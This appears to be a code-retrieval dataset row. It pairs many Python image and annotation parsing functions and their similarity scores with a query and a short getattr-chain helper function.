"def process(image):\n pass", "def _process_img_semantic(self, sensor_data):\n sensor_data.convert(self.cc)\n img = np.array(sensor_data.raw_data).reshape((self.img_y, self.img_x, 4))\n img = img[:, :, :3] # sensor is actualy rgba, we dont need alpha values\n self.semantic = img # need to scale rgb values to be {0,1}", "def load_annotations(self, index):\n anns_file = open(os.path.join(self.folder_path, self.image_ids[index] + '.json'))\n labels = json.load(anns_file)\n labels = labels[\"shapes\"]\n anns_file.close()\n return labels.copy()", "def parse_image_filename(filename):\n\n # regexes\n starts_with_six_digits = re.compile(r'^\\d{6}')\n capital_letter = re.compile(r'([A-Z]{1})')\n plus = re.compile(r'\\+')\n\n # split the filename and extention\n filename, extension = os.path.splitext(filename)\n try:\n style_number, color, description = filename.split('_')\n except Exception as e:\n print(e)\n print(filename, extension)\n\n style_number = int(style_number)\n\n # decode the color\n # intCaps -> int/caps\n color = capital_letter.sub(r'/\\1', color).lower()\n # plus+to+space -> plus to space\n color = plus.sub(r' ', color)\n\n # decode the description\n description = plus.sub(r' ', description)\n\n return style_number, color, description", "def extract_info(models_folder: str, image_path: str) -> Person:\n person = Person('test', datetime.date.today(), 'test', 'test', 'test')\n\n tools = pyocr.get_available_tools()\n if len(tools) == 0:\n print(\"No OCR tool found\")\n sys.exit(1)\n\n # odaberemo Tessract - prvi na listi ako je jedini alat\n tool = tools[0]\n print(\"Koristimo backend: %s\" % (tool.get_name()))\n # biramo jezik očekivanog teksta\n lang = 'eng'\n\n # TODO - Prepoznati sve neophodne vrednosti o osobi sa slike. Vrednosti su: Name, Date of Birth, Job,\n # Social Security Number, Company Name\n\n image = cv2.imread(image_path)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n original = image.copy()\n plt.imshow(image)\n plt.show()\n\n # todo rotate image\n canimg = cv2.Canny(gray, 50, 200)\n lines = cv2.HoughLines(canimg, 1, np.pi / 180.0, 200, np.array([]))\n rho, theta = lines[0][0]\n\n plt.imshow(image)\n # plt.show()\n\n (h, w) = image.shape[:2]\n center = (w // 2, h // 2)\n M = cv2.getRotationMatrix2D(center, 180 * theta / 3.1415926 - 90, 1.0)\n newImage = cv2.warpAffine(image, M, (w, h), flags=cv2.INTER_CUBIC, borderMode=cv2.BORDER_REPLICATE)\n plt.imshow(newImage)\n plt.show()\n\n if is_similar(original, newImage):\n rho, theta = findparallel_web(lines)[0][0]\n (h, w) = image.shape[:2]\n center = (w // 2, h // 2)\n M = cv2.getRotationMatrix2D(center, 180 * theta / 3.1415926 - 90, 1.0)\n newImage = cv2.warpAffine(image, M, (w, h), flags=cv2.INTER_CUBIC, borderMode=cv2.BORDER_REPLICATE)\n plt.imshow(newImage)\n plt.show()\n\n freshNewImage = newImage.copy()\n\n # todo ekstrakcije kartice\n canimg = cv2.Canny(cv2.cvtColor(newImage, cv2.COLOR_BGR2GRAY), 50, 200)\n lines = cv2.HoughLines(canimg, 1, np.pi / 180.0, 180, np.array([]))\n min_x = 999\n max_x = 1\n min_y = 999\n max_y = 1\n for line in lines:\n rho, theta = line[0]\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * (-b))\n y1 = int(y0 + 1000 * (a))\n x2 = int(x0 - 1000 * (-b))\n y2 = int(y0 - 1000 * (a))\n cv2.line(newImage, (x1, y1), (x2, y2), (0, 0, 255), 2)\n\n if 0 < y1 < 1000 and y1 > max_y:\n max_y = y1\n if 0 < y1 < 1000 and y1 < min_y:\n min_y = y1\n if 0 < x1 < 1000 and x1 < min_x:\n min_x = x1\n if 0 < x1 < 1000 and x1 > max_x:\n max_x = x1\n\n plt.imshow(newImage)\n # plt.show()\n\n height, width, channels = newImage.shape\n\n if min_x == 999:\n min_x = 0\n if max_x == 1:\n max_x = width\n if min_y == 999:\n min_y = 0\n if max_y == 1:\n max_y = height\n if min_y == max_y:\n min_y = 0\n max_y = height\n if min_x == max_x:\n min_x = 0\n max_x = width\n crop_img = freshNewImage[min_y:max_y, min_x:max_x]\n\n plt.imshow(crop_img)\n plt.show()\n\n path = image_path[-11:]\n full_path = 'cropped/' + path\n cv2.imwrite(full_path, crop_img)\n\n canimg = cv2.Canny(cv2.cvtColor(crop_img, cv2.COLOR_BGR2RGB), 50, 200)\n plt.imshow(canimg)\n # plt.show()\n\n img = cv2.detailEnhance(crop_img, sigma_s=3, sigma_r=0.55)\n plt.imshow(img)\n plt.show()\n\n # todo ekstrakcija teksta\n # text = tool.image_to_string(\n # Image.fromarray(img),\n # lang=lang,\n # builder=pyocr.builders.TextBuilder(tesseract_layout=1) # izbor segmentacije (PSM)\n # )\n\n line_and_word_boxes = tool.image_to_string(\n Image.fromarray(img), lang=lang,\n builder=pyocr.builders.LineBoxBuilder(tesseract_layout=3)\n )\n\n for i, line in enumerate(line_and_word_boxes):\n # print('line %d' % i)\n print(line.content, line.position, i)\n # print('boxes')\n if 'ibm' in line.content.lower():\n person.company = 'IBM'\n try:\n person.name = line_and_word_boxes[2].content\n person.ssn = line_and_word_boxes[3].content\n person.job = line_and_word_boxes[4].content[5:]\n except:\n return person\n break\n # person.date_of_birth = datetime.AnyStr(line_and_word_boxes[5].content)\n if 'apple' in line.content.lower():\n person.company = 'Apple'\n try:\n person.job = line_and_word_boxes[1].content\n person.name = line_and_word_boxes[2].content\n person.ssn = line_and_word_boxes[8].content\n except:\n return person\n break\n if 'google' in line.content.lower():\n person.company = 'Google'\n try:\n person.name = line_and_word_boxes[9].content\n person.ssn = line_and_word_boxes[10].content\n person.job = line_and_word_boxes[11].content\n except:\n return person\n break\n # for box in line.word_boxes:\n # print(box.content, box.position, box.confidence)\n # print()\n\n return person\n\n # # todo detekcija broja\n # digits = tool.image_to_string(\n # Image.fromarray(image),\n # lang=lang,\n # builder=pyocr.builders.DigitBuilder(tesseract_layout=3) # ocekivani text je single line, probati sa 3,4,5..\n # )\n\n # # todo izlaz lista reči sa tekstom, koordinatama i faktorom sigurnosti\n # word_boxes = tool.image_to_string(\n # Image.fromarray(image),\n # lang=lang,\n # builder=pyocr.builders.WordBoxBuilder(tesseract_layout=3)\n # )\n # for i, box in enumerate(word_boxes):\n # print(\"word %d\" % i)\n # print(box.content, box.position, box.confidence)\n # print()\n\n # # todo izlaz po redovima\n # line_and_word_boxes = tool.image_to_string(\n # Image.fromarray(image), lang=lang,\n # builder=pyocr.builders.LineBoxBuilder(tesseract_layout=3)\n # )\n # for i, line in enumerate(line_and_word_boxes):\n # print('line %d' % i)\n # print(line.content, line.position)\n # print('boxes')\n # for box in line.word_boxes:\n # print(box.content, box.position, box.confidence)\n # print()", "def load_face_instances(txt, annotation_dirname, image_root, class_names):\n # Needs to read many small annotation files. Makes sense at local\n\n lines = open(txt).readlines()\n dicts = []\n for line in lines:\n fileid = line.strip()\n jpeg_file = os.path.join(image_root, fileid + \".jpg\")\n anno_file = os.path.join(annotation_dirname, fileid + \".xml\")\n\n with PathManager.open(anno_file) as f:\n tree = ET.parse(f)\n\n r = {\n \"file_name\": jpeg_file,\n \"image_id\": fileid,\n \"height\": int(tree.findall(\"./size/height\")[0].text),\n \"width\": int(tree.findall(\"./size/width\")[0].text),\n }\n instances = []\n\n for obj in tree.findall(\"object\"):\n cls = obj.find(\"name\").text\n # We include \"difficult\" samples in training.\n # Based on limited experiments, they don't hurt accuracy.\n # difficult = int(obj.find(\"difficult\").text)\n # if difficult == 1:\n # continue\n bbox = obj.find(\"bndbox\")\n bbox = [float(bbox.find(x).text) for x in [\"xmin\", \"ymin\", \"xmax\", \"ymax\"]]\n # Original annotations are integers in the range [1, W or H]\n # Assuming they mean 1-based pixel indices (inclusive),\n # a box with annotation (xmin=1, xmax=W) covers the whole image.\n # In coordinate space this is represented by (xmin=0, xmax=W)\n bbox[0] -= 1.0\n bbox[1] -= 1.0\n instances.append(\n {\"category_id\": class_names.index(cls), \"bbox\": bbox, \"bbox_mode\": BoxMode.XYXY_ABS}\n )\n r[\"annotations\"] = instances\n dicts.append(r)\n\n return dicts", "def _parse_ann_info(self, idx, with_mask=True):\n\n img_id = self.img_infos[idx]['id']\n ann_ids = self.coco.getAnnIds(imgIds=[img_id])\n ann_info = self.coco.loadAnns(ann_ids)\n\n gt_bboxes = []\n gt_labels = []\n gt_bboxes_ignore = []\n rf_imgs = []\n rf_masks = []\n rf_ann_ids = []\n # Two formats are provided.\n # 1. mask: a binary map of the same size of the image.\n # 2. polys: each mask consists of one or several polys, each poly is a\n # list of float.\n\n # choose category in train split\n i = 1 if self.test_mode else 0\n index = np.random.randint(len(ann_info))\n cat = ann_info[index]['category_id']\n while cat not in self.cats[i]:\n index = np.random.randint(len(ann_info))\n cat = ann_info[index]['category_id']\n\n for _ in range(self.k_shot):\n flag = True \n\n while flag: \n rf_img_ids = self.coco.getImgIds(catIds=[cat])\n rf_img_id = rf_img_ids[np.random.randint(0, len(rf_img_ids))]\n while rf_img_id == img_id:\n rf_img_id = rf_img_ids[np.random.randint(0, len(rf_img_ids))]\n\n rf_ann_ids_ = self.coco.getAnnIds(imgIds=rf_img_id, catIds=[cat], iscrowd=False)\n\n if len(rf_ann_ids_) > 0:\n flag = False\n rf_ann_id = rf_ann_ids_[np.random.randint(0, len(rf_ann_ids_))]\n\n rf_ann = self.coco.loadAnns([rf_ann_id])[0]\n\n rf_mask = self.coco.annToMask(rf_ann)\n\n rf_img_file = self.coco.loadImgs([rf_img_id])[0]['file_name']\n\n rf_img = mmcv.imread(osp.join(self.img_prefix, rf_img_file))\n \n rf_img, rf_mask = prepare_rf(rf_img, rf_ann, cat, rf_mask, enlarge=self.enlarge_ref)\n\n rf_imgs.append(rf_img)\n rf_masks.append(rf_mask)\n rf_ann_ids.append(rf_ann_id)\n\n if self.with_mask:\n gt_masks = []\n gt_mask_polys = []\n gt_poly_lens = []\n for i, ann in enumerate(ann_info):\n if ann.get('ignore', False):\n continue\n x1, y1, w, h = ann['bbox']\n if ann['area'] <= 0 or w < 1 or h < 1:\n continue\n bbox = [x1, y1, x1 + w - 1, y1 + h - 1]\n if ann['iscrowd']:\n gt_bboxes_ignore.append(bbox)\n elif ann['category_id'] == cat:\n gt_bboxes.append(bbox)\n gt_labels.append(1) # change here\n # gt_labels.append(self.trans_form_label[cat])\n else:\n continue\n\n if self.with_mask:\n gt_masks.append(self.coco.annToMask(ann))\n mask_polys = [\n p for p in ann['segmentation'] if len(p) >= 6\n ] # valid polygons have >= 3 points (6 coordinates)\n poly_lens = [len(p) for p in mask_polys]\n gt_mask_polys.append(mask_polys)\n gt_poly_lens.extend(poly_lens)\n \n if gt_bboxes:\n gt_bboxes = np.array(gt_bboxes, dtype=np.float32)\n gt_labels = np.array(gt_labels, dtype=np.int64)\n else:\n gt_bboxes = np.zeros((0, 4), dtype=np.float32)\n gt_labels = np.array([], dtype=np.int64)\n\n if gt_bboxes_ignore:\n gt_bboxes_ignore = np.array(gt_bboxes_ignore, dtype=np.float32)\n else:\n gt_bboxes_ignore = np.zeros((0, 4), dtype=np.float32)\n\n # assert len(gt_masks) == len(gt_bboxes), f\"{len(gt_masks), len(gt_bboxes)}, {gt_bboxes_ignore}\"\n\n ann = dict(\n img_id=img_id,\n rf_img=rf_imgs,\n rf_mask=rf_masks,\n rf_ann_id=(idx, img_id, cat, rf_ann_ids),\n bboxes=gt_bboxes,\n labels=gt_labels,\n bboxes_ignore=gt_bboxes_ignore)\n\n if self.with_mask:\n ann['masks'] = gt_masks\n # poly format is not used in the current implementation\n ann['mask_polys'] = gt_mask_polys\n ann['poly_lens'] = gt_poly_lens\n return ann", "def olive_image_parser(text: bytes) -> Optional[dict]:\n soup = BeautifulSoup(text, \"lxml\")\n root = soup.find(\"xmd-entity\")\n\n try:\n assert root is not None\n img = {\n 'id': root.get('id'),\n 'coords': root.img.get('box').split(),\n 'name': root.meta.get('name'),\n 'resolution': root.meta.get('images_resolution'),\n 'filepath': root.img.get('href')\n }\n return img\n except AssertionError:\n return None", "def _parse_tfexample(example):\n\n ## parse\n features = tf.parse_single_example(example, KEYS2FEATURES)\n\n image = tf.image.decode_png(features['image/encoded'])\n label = tf.image.decode_png(features['label/encoded'])\n # label is decoded as a 3-D png image\n label = label[..., 0]\n im_path = features['image/path']\n la_path = features['label/path']\n\n return image, label, im_path, la_path", "def _parse_anno_info(self, annotations):\n gt_bboxes, gt_bboxes_ignore = [], []\n gt_masks, gt_masks_ignore = [], []\n gt_labels = []\n for ann in annotations:\n if ann.get('iscrowd', False):\n gt_bboxes_ignore.append(ann['bbox'])\n gt_masks_ignore.append(ann.get('segmentation', None))\n else:\n gt_bboxes.append(ann['bbox'])\n gt_labels.append(ann['category_id'])\n gt_masks.append(ann.get('segmentation', None))\n if gt_bboxes:\n gt_bboxes = np.array(gt_bboxes, dtype=np.float32)\n gt_labels = np.array(gt_labels, dtype=np.int64)\n else:\n gt_bboxes = np.zeros((0, 4), dtype=np.float32)\n gt_labels = np.array([], dtype=np.int64)\n\n if gt_bboxes_ignore:\n gt_bboxes_ignore = np.array(gt_bboxes_ignore, dtype=np.float32)\n else:\n gt_bboxes_ignore = np.zeros((0, 4), dtype=np.float32)\n\n ann = dict(\n bboxes=gt_bboxes,\n labels=gt_labels,\n bboxes_ignore=gt_bboxes_ignore,\n masks_ignore=gt_masks_ignore,\n masks=gt_masks)\n\n return ann", "def tag_parser(file_path: str):\n with open(file_path) as f:\n t = f.read()\n t = t.split(\"Points =\\n\")[1]\n t = t.replace(\" 0.1 1 1 \\\"Marker\\\"\", \"\")\n t = t.replace(\";\", \"\")\n t = t.replace(\" \\n\", \"\\n\")\n t = t[1:]\n t = StringIO(t)\n\n return np.genfromtxt(t, delimiter=' ')", "def load_annotations_from_file_in_mtr_format(filepath: str) -> List[Union[str, int, float]]:\n with open(filepath, 'r') as f:\n json_obj = json.load(f)\n # print(json_obj)\n bounding_boxes = json_obj['bounding_boxes']\n \n # filter out noisy annotations\n # and convert the data to kitti MOTS data format\n \n # []\n annotation_list = []\n track_id = -1\n for bboxes in bounding_boxes:\n if(bboxes['center']['z'] is None or bboxes['height'] is None or bboxes['height'] < 0.01 \\\n or bboxes['width'] < 0.01 or bboxes['length'] < 0.01):\n continue\n # annotation = [frame_id, -1]\n annotation = []\n # print(\"type: \", str2id(bboxes['object_id']))\n # object_type = bboxes['object_id'] # suppress as 'pedestrian'\n object_type = 'pedestrian'\n # truncated = -1\n # occluded = -1\n # alpha = -1\n # bbox2d = [-1, -1, -1, -1]\n dimensions = [bboxes['height'], bboxes['width'], bboxes['length']]\n # dimensions = [bboxes['height'], bboxes['length'], bboxes['width']]\n location = [bboxes['center']['x'], bboxes['center']['y'], bboxes['center']['z']]\n rotation_y = bboxes['angle']\n\n annotation.append(object_type)\n # annotation.append(truncated)\n # annotation.append(occluded)\n # annotation.append(alpha)\n # annotation += bbox2d\n annotation += dimensions\n annotation += location\n annotation.append(rotation_y)\n annotation_list.append(annotation)\n return annotation_list\n\n \"\"\"\n \"\"\"", "def prepare_train_img(self, index):\n img_ann_info = self.data_infos[index]\n img_info = {\n 'filename': img_ann_info['file_name'],\n 'height': img_ann_info['height'],\n 'width': img_ann_info['width']\n }\n ann_info = self._parse_anno_info(img_ann_info['annotations'])\n results = dict(img_info=img_info, ann_info=ann_info)\n results['bbox_fields'] = []\n results['mask_fields'] = []\n results['seg_fields'] = []\n self.pre_pipeline(results)\n\n return self.pipeline(results)", "def extract_visual(flir_image_path):\n\n visual_img_bytes = subprocess.check_output([\"exiftool\", \"-EmbeddedImage\", \"-b\", flir_image_path])\n visual_img_stream = io.BytesIO(visual_img_bytes)\n\n visual_img = Image.open(visual_img_stream)\n visual_np = np.array(visual_img)\n\n return visual_np", "def parse_image_data(image_urls):\n\n # Initialize images.\n initialized_ClImages = list(map(ClImage, image_urls))\n app = ClarifaiApp(api_key=CLARIFAI_KEY)\n image_info = {}\n\n # Obtain relevant tag information\n try:\n general_response = app.models.get('general-v1.3').predict(initialized_ClImages)\n except ApiError as e:\n error = json.loads(e.response.content)\n pprint('error: {}'.format(error))\n\n else:\n for item in general_response['outputs']:\n video_id = item['input']['data']['image']['url'][23:34]\n thumbnail_tags = set()\n for tag in item['data']['concepts']:\n if tag['value'] > .9:\n tag_string = tag['name'].strip().lower()\n if not Tag.query.filter(Tag.tag == tag_string).first():\n add_tag_data(tag_string)\n thumbnail_tags.add(tag_string)\n image_info[video_id] = {'tags': thumbnail_tags}\n\n\n # Obtain nsfw score\n try:\n nsfw_response = app.models.get('nsfw-v1.0').predict(initialized_ClImages)\n except ApiError as e:\n error = json.loads(e.response.content)\n pprint('error: {}'.format(error))\n\n else:\n for item in nsfw_response['outputs']: #nsfw_r['outputs'] is a list\n video_id = item['input']['data']['image']['url'][23:34]\n nsfw_score = round(item['data']['concepts'][-1]['value'] * 100)\n image_info[video_id]['nsfw_score'] = nsfw_score\n\n\n # Obtain color data\n # try:\n # color_response = app.models.get('color').predict(initialized_ClImages)\n # except ApiError as e:\n # error = json.loads(e.response.content)\n # pprint('error: {}'.format(error[-100:]))\n\n # else:\n # for item in color_response['outputs']:\n # video_id = item['input']['data']['image']['url'][23:34]\n # color_tags = {}\n # for color in item['data']['colors']: # item['data']['colors'] is a list\n # if color['value'] > .2:\n # color_hex = color['w3c']['hex'].rstrip().lower()\n # color_name = color['w3c']['name'].rstrip().lower()\n # if not Color.query.filter(Color.hex_code == color_hex).first():\n # add_color_data(color_hex, color_name)\n # image_info[video_id]['colors'] = color_tags\n\n return image_info", "def process_payload(payload):\n\n # Convertion of payload string to image array for opencv\n ret, img = make_image(payload)#ret is 0 when conversion is successful or 1 when not\n result='Unable to detect'\n if ret == 0:\n cv2.imwrite('received.png', img)\n try:\n roi = extract_roi_2(img)\n \n result = detect(roi) \n \n #write_characters(roi)\n\n except:\n result = \"----------------\"\n # # When roi is extracted its a 2d array \n \n return result", "def _load_kitti_annotation(self, index):\n\n if self._image_set == 'test':\n lines = []\n else:\n filename = os.path.join(self._data_path, 'training', 'label_2', index + '.txt')\n lines = []\n with open(filename) as f:\n for line in f:\n words = line.split()\n cls = words[0]\n truncation = float(words[1])\n occlusion = int(words[2])\n height = float(words[7]) - float(words[5])\n if cls in self._class_to_ind and truncation < 0.5 and occlusion < 3 and height > 25:\n #if cls in self._class_to_ind:\n lines.append(line)\n\n num_objs = len(lines)\n \n boxes = np.zeros((num_objs, 4), dtype=np.float32)\n gt_classes = np.zeros((num_objs), dtype=np.int32)\n overlaps = np.zeros((num_objs, self.num_classes), dtype=np.float32)\n\n for idx, line in enumerate(lines):\n words = line.split()\n cls = self._class_to_ind[words[0]]\n boxes[idx, :] = [float(num) for num in words[4:8]]\n gt_classes[idx] = cls\n overlaps[idx, cls] = 1.0\n\n overlaps = scipy.sparse.csr_matrix(overlaps)\n\n return {'boxes' : boxes,\n 'gt_classes' : gt_classes,\n 'gt_overlaps' : overlaps,\n 'flipped' : False}", "def parse_info(df, idx, root):\n df_row = df.iloc[idx]\n\n img_id = str(df_row['id'])\n img_name = id_to_path(root, img_id)\n landmark_id = df_row.landmark_id\n return img_name, landmark_id", "def inspect_every_images_with_annotations_of_folder(image_path, annotation_path):\n assert os.path.isdir(image_path)\n assert os.path.isdir(annotation_path)\n list_images = os.listdir(image_path)\n list_annotations = os.listdir(annotation_path)\n for i in range(len(list_images)):\n image_file, annotation_file = list_images[i], list_annotations[i]\n image = os.path.join(image_path, image_file)\n annotation = os.path.join(annotation_path, annotation_file)\n with Image.open(image) as img:\n tree = ET.parse(annotation)\n root = tree.getroot()\n for member in root.findall('object'):\n # bbox contains 4 coordinate of format [xmin, ymin, xmax, ymax]\n bbox = member.find(\"bndbox\")\n\n # if object is None, ignore\n if member.find(\"name\") is None:\n continue\n\n xmin = int(bbox.find('xmin').text)\n ymin = int(bbox.find('ymin').text)\n xmax = int(bbox.find('xmax').text)\n ymax = int(bbox.find('ymax').text)\n\n draw = ImageDraw.Draw(img)\n draw.rectangle([xmin, ymin, xmax, ymax], width=2)\n img.show()", "def __getitem__(self, index):\n # read a image given a random integer index\n img_path = self.img_paths[index]\n image = cv2.imread(img_path, cv2.IMREAD_UNCHANGED)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n # set paths of annotation maps\n segment_path = os.path.join(self.segment_dir, os.path.basename(img_path))\n edge_path = os.path.join(self.edge_dir, os.path.basename(img_path))\n centerline_path = os.path.join(self.centerline_dir, os.path.basename(img_path))\n\n # load annotation maps and only use the red channel\n segment = cv2.imread(segment_path, cv2.IMREAD_UNCHANGED)\n edge = cv2.imread(edge_path, cv2.IMREAD_UNCHANGED)\n centerline = cv2.imread(centerline_path, cv2.IMREAD_UNCHANGED)\n\n # from color to gray\n segment = convert_from_color_annotation(segment)\n edge = convert_from_color_annotation(edge)\n centerline = convert_from_color_annotation(centerline)\n \n # resize\n w, h = self.opt.load_width, self.opt.load_height\n if w > 0 or h > 0:\n image = cv2.resize(image, (w, h), interpolation=cv2.INTER_CUBIC)\n segment = cv2.resize(segment, (w, h), interpolation=cv2.INTER_CUBIC)\n edge = cv2.resize(edge, (w, h), interpolation=cv2.INTER_CUBIC)\n centerline = cv2.resize(centerline, (w, h), interpolation=cv2.INTER_CUBIC)\n\n # apply flip\n if (not self.opt.no_flip) and random.random() > 0.5:\n if random.random() > 0.5:\n image = np.fliplr(image)\n segment = np.fliplr(segment)\n edge = np.fliplr(edge)\n centerline = np.fliplr(centerline)\n else:\n image = np.flipud(image)\n segment = np.flipud(segment)\n edge = np.flipud(edge)\n centerline = np.flipud(centerline)\n\n # apply affine transform\n if self.opt.use_augment:\n if random.random() > 0.5:\n angle, scale, shift = get_params()\n image = affine_transform(image, angle, scale, shift, w, h)\n segment = affine_transform(segment, angle, scale, shift, w, h)\n edge = affine_transform(edge, angle, scale, shift, w, h)\n centerline = affine_transform(centerline, angle, scale, shift, w, h)\n\n # binarize annotation maps\n _, segment = cv2.threshold(segment, 127, 1, cv2.THRESH_BINARY)\n _, edge = cv2.threshold(edge, 127, 1, cv2.THRESH_BINARY)\n _, centerline = cv2.threshold(centerline, 127, 1, cv2.THRESH_BINARY)\n\n # apply the transform to both A and B\n image = self.img_transforms(Image.fromarray(image.copy()))\n segment = self.lab_transform(segment.copy()).unsqueeze(0).float()\n edge = self.lab_transform(edge.copy()).unsqueeze(0).float()\n centerline = self.lab_transform(centerline.copy()).unsqueeze(0).float()\n\n return {'image': image, \n 'segment': segment, \n 'edge': edge, \n 'centerline': centerline, \n 'A_paths': img_path}", "def vl2img(vl_json_in, fileformat):\n\n # TODO would prefer to do this properly with pipes\n # using | and shell=True is safe though given no arguments\n executables = {\"svg\": \"vg2svg\", \"png\": \"vg2png\", \"pdf\": \"vg2pdf\"}\n try:\n exe = executables[fileformat]\n except KeyError as e:\n print(e.output)\n try:\n return subprocess.check_output(\"vl2vg | %s\" % exe, shell=True, input=vl_json_in)\n except subprocess.CalledProcessError as e:\n print(e.output)", "def parse_img(image_path):\n image = tf.read_file(image_path)\n image = tf.image.decode_image(image)\n image = tf.reshape(image, [INITIAL_RES, INITIAL_RES, 3])\n image = tf.image.resize_images(image, [OUTPUT_RES, OUTPUT_RES])\n #image = image[:, :, ::-1] # BGE -> RGB conversion if needed?\n #image = tf.image.rgb_to_grayscale(image)\n #image = tf.image.convert_image_dtype(image, tf.float32) # In neuralNet.py\n image = image.eval() # Convert from tensor to Numpy array for Keras\n return image", "def get(self,index,record, indices):\n video_id = str(record.path).strip().split('/frames/')[1]\n \n gt = np.zeros((self.num_segments,self.cfg.MAX_NUM_GT_BOXES,(self.num_class + 4)),\n dtype=np.float32)\n num_boxes = np.ones((self.num_segments),dtype=np.float32)\n im_info = np.zeros((self.num_segments,3),dtype=np.float32)\n one_hot_labels = np.zeros((self.num_class),dtype = np.float)\n count = 0\n images =[]\n\n class_label =int(record.labels)\n one_hot_labels[class_label] = 1\n frame_index = list(self._mat_gt_[video_id].keys()) \n \n for seg_ind in indices:\n\n #image information \n cur_frame = frame_index[0]+seg_ind\n image_path = os.path.join(record.path, '{:05d}.jpg'.format(cur_frame))\n im = imread(image_path)\n im = im[:,:,::-1].astype(np.float32, copy=False) #RGB\n height,width,_= im.shape \n im_scale = float(self.cfg.TRAIN.TRIM_HEIGHT) / float(self.cfg.TRAIN.TRIM_WIDTH)\n im = cv2.resize(im, (400,300), fx=im_scale, fy=im_scale,\n interpolation=cv2.INTER_LINEAR)\n im_scale1 = float(self.cfg.TRAIN.TRIM_HEIGHT) / height\n im_scale2 = float(self.cfg.TRAIN.TRIM_WIDTH) / width\n im_info[count,:]=self.cfg.TRAIN.TRIM_HEIGHT,len(im[2]),im_scale\n \n gt[count,0,:4] = self._load_UCF101_annotation(video_id,cur_frame,self._mat_gt_) \n x1,y1,x2,y2 = gt[count,0,:4]\n y1,y2 = y1*im_scale1,y2*im_scale1\n x1,x2 = x1*im_scale2,x2*im_scale2\n gt[count,0,:4] = x1,y1,x2,y2\n #if gt[count,0,:4].any():\n gt[count,0,4:] = one_hot_labels\n #else:\n # gt[count,0,4:] = np.zeros((1,self.cfg.MAX_NUM_GT_BOXES,self.num_class),dtype = float)\n \n count += 1\n images.append(im)\n \n \n max_shape = np.array([imz.shape for imz in images]).max(axis=0)\n blob = np.zeros((len(images), max_shape[0], max_shape[1], 3),\n dtype=np.float32)\n for i in range(len(images)):\n blob[i,0:images[i].shape[0], 0:images[i].shape[1], :] = images[i]\n\n process_data = self.transform(blob)\n return process_data,gt,num_boxes,im_info", "def load_annotations(self):\n if self.ann_file.endswith('.json'):\n return self.load_json_annotations()\n\n video_infos = []\n with open(self.ann_file, 'r') as fin:\n for line in fin:\n line_split = line.strip().split()\n if self.multi_class:\n assert self.num_classes is not None\n filename, label = line_split[0], line_split[1:]\n label = list(map(int, label))\n else:\n filename, label = line_split\n label = int(label)\n if self.data_prefix is not None:\n filename = osp.join(self.data_prefix, filename)\n video_infos.append(dict(filename=filename, label=label))\n while len(video_infos) < self.min_video_num:\n left_num = min(self.min_video_num - len(video_infos), len(video_infos))\n video_infos.extend(random.sample(video_infos, left_num))\n return video_infos", "def parser(self, serialized_example):\n features = {\n 'image/height': tf.FixedLenFeature([], tf.int64),\n 'image/width': tf.FixedLenFeature([], tf.int64),\n 'image/colorspace': tf.FixedLenFeature([], tf.string),\n 'image/channels': tf.FixedLenFeature([], tf.int64),\n 'image/class/label': tf.FixedLenFeature([], tf.int64),\n 'image/format': tf.FixedLenFeature([], tf.string),\n 'image/encoded': tf.FixedLenFeature([], tf.string),\n 'image/fixation_pt': tf.FixedLenFeature([2], tf.float32)}\n parsed_features = tf.parse_single_example(serialized_example, features)\n\n # Get label as a Tensor.\n label = parsed_features['image/class/label']\n\n # Decode the image JPEG string into a Tensor.\n image = tf.image.decode_jpeg(parsed_features['image/encoded'],\n channels=self.DEPTH)\n\n # Convert from uint8 -> float32 and map onto range [0, 1].\n image = tf.cast(image, tf.float32) * (1. / 255)\n\n # Standardize image.\n image = tf.image.per_image_standardization(image)\n\n # Apply data augmentation.\n if (self.mode == tf.estimator.ModeKeys.TRAIN\n and self.params['train_with_distortion']):\n # Randomly flip the image, zero-pad with four pixels along\n # each edge, and take a random 32 x 32 crop.\n image = tf.image.random_flip_left_right(image)\n image = tf.image.resize_image_with_crop_or_pad(image, 40, 40)\n image = tf.image.crop_to_bounding_box(image,\n tf.random_uniform([], minval=0, maxval=8, dtype=tf.int32),\n tf.random_uniform([], minval=0, maxval=8, dtype=tf.int32),\n 32, 32)\n\n return image, label", "def parse_line(line):\n\n line = line.split(' ')\n _, _, top_left_x, top_left_y, width, height, rotation = [float(x) for x in line]\n box = cv2.boxPoints(((top_left_x + width / 2, top_left_y + height / 2),\n (width, height), rotation * 57.2958))\n quadrilateral = [int(x) for x in box.reshape([-1])]\n xmin = min(quadrilateral[0::2])\n xmax = max(quadrilateral[0::2])\n\n ymin = min(quadrilateral[1::2])\n ymax = max(quadrilateral[1::2])\n\n word_annotation = {\n 'bbox': [xmin, ymin, xmax - xmin, ymax - ymin],\n 'segmentation': [quadrilateral],\n 'attributes': {\n 'transcription': '',\n 'legible': 1,\n 'language': '',\n }\n }\n\n return word_annotation" ]
[ "0.66137487", "0.6137905", "0.6088444", "0.60218704", "0.6018169", "0.6017987", "0.6013739", "0.59796065", "0.5911451", "0.58495057", "0.584628", "0.5830778", "0.58306414", "0.5818035", "0.58085626", "0.5796074", "0.57908374", "0.5716362", "0.57042414", "0.5697437", "0.56964636", "0.568658", "0.5676072", "0.56731385", "0.565975", "0.5659391", "0.5657615", "0.5655633", "0.5651093", "0.56453943", "0.5641678", "0.5639812", "0.56332576", "0.5631421", "0.5631421", "0.5629971", "0.562391", "0.561179", "0.5602923", "0.5593124", "0.5591606", "0.55909663", "0.55824256", "0.5578133", "0.55753595", "0.5571614", "0.5567002", "0.5564263", "0.5547136", "0.5534025", "0.55244267", "0.5520432", "0.551903", "0.55186504", "0.5497994", "0.54956514", "0.5494844", "0.54943496", "0.548561", "0.5467481", "0.54620874", "0.5459843", "0.54565334", "0.545425", "0.54526466", "0.54446375", "0.544399", "0.543834", "0.5435859", "0.5432993", "0.54266393", "0.5424577", "0.5423968", "0.5419924", "0.541656", "0.5407224", "0.54045033", "0.5395582", "0.538799", "0.5386226", "0.5375711", "0.53743374", "0.53721046", "0.5364236", "0.53586274", "0.53551686", "0.53551155", "0.5351515", "0.53467536", "0.53426373", "0.5341988", "0.5327872", "0.53188914", "0.53146034", "0.5314533", "0.5313252", "0.5308743", "0.53058964", "0.5302833", "0.53012705" ]
0.6034063
3
recourse through an attribute chain to get the ultimate value.
def safe_chain_getattr(obj, attr): return reduce(getattr, attr.split('.'), obj)
